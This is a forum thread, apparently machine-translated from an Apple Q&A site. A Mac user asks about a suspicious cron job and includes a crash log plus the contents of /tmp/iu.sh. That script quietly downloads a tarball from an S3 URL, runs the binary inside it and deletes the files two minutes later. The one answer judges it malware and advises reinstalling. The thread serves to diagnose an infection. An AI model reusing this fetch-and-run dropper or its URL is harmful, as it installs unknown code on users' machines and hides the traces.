Cron mail notifica un error de secuencia de comandos desconocida sospechosa

0

Gracias a la función de correo de la Terminal, me llamó la atención que había algún tipo de trabajo cron en ejecución con algunos errores.

El correo del cron proporciona esta información:

2018-08-02 23:47:22.698 xSf[717:27543] *** Terminating app due to uncaught exception 'NSInvalidArgumentException', reason: '*** -[_NSPlaceholderData initWithBase64EncodedString:options:]: nil string argument'
*** First throw call stack:
(
    0   CoreFoundation                      0x00007fff57d622db __exceptionPreprocess + 171
    1   libobjc.A.dylib                     0x00007fff7eeffc76 objc_exception_throw + 48
    2   CoreFoundation                      0x00007fff57df3d7d +[NSException raise:format:] + 205
    3   Foundation                          0x00007fff59e028ee -[NSData(NSData) initWithBase64EncodedString:options:] + 84
    4   xSf                                 0x000000010b54fd19 INJECTOR_decryptData_RNCryptor + 121
    5   xSf                                 0x000000010b55010a -[l196gKNh f27WaC8u:path:] + 410
    6   xSf                                 0x000000010b54ff2e -[l196gKNh s7PJWuXO:] + 158
    7   xSf                                 0x000000010b552cd1 main + 225
    8   libdyld.dylib                       0x00007fff7fb19015 start + 1
)
libc++abi.dylib: terminating with uncaught exception of type NSException
/tmp/iu.sh: line 6:   717 Abort trap: 6           ./xSf

Parece que esto fue ejecutado por un script ubicado en: ~/Library/sandastros.np/sandastros.np cuyo contenido no puedo leer o descifrar.

Verifiqué el script ubicado en /tmp/iu.sh que contiene lo siguiente:

#!/bin/bash
/usr/bin/curl -s -L -o /var/tmp/xSf.tgz "https://s3.amazonaws.com/xsfer/xSf.tgz"
mkdir -p /var/tmp/xSf
tar -xzf /var/tmp/xSf.tgz -C /var/tmp/xSf/
cd /var/tmp/xSf/
./xSf

func_cccc(){
sleep 120
rm -rf /var/tmp/xSf
rm -rf /var/tmp/xSf.tgz
}
func_cccc &

Se puede acceder a esa URL, pero no quería descargar y abrir el archivo tar. Los permisos de carpeta /tmp están configurados correctamente, aunque iu.sh tiene a mi usuario como propietario, por lo que parece permitir la instalación de cualquier cosa que pueda haberle dado permiso.

¿Alguna pista sobre qué es esto?

    
pregunta Dez 04.08.2018 - 14:23

1 respuesta

2

Se parece mucho a algún tipo de malware.

Si no sabe de dónde vinieron xSF y sandastros.np, consideraría que la computadora está comprometida y hacer un formato completo y reinstalar.

    
respondido por el jksoegaard 04.08.2018 - 14:57

Lea otras preguntas en las etiquetas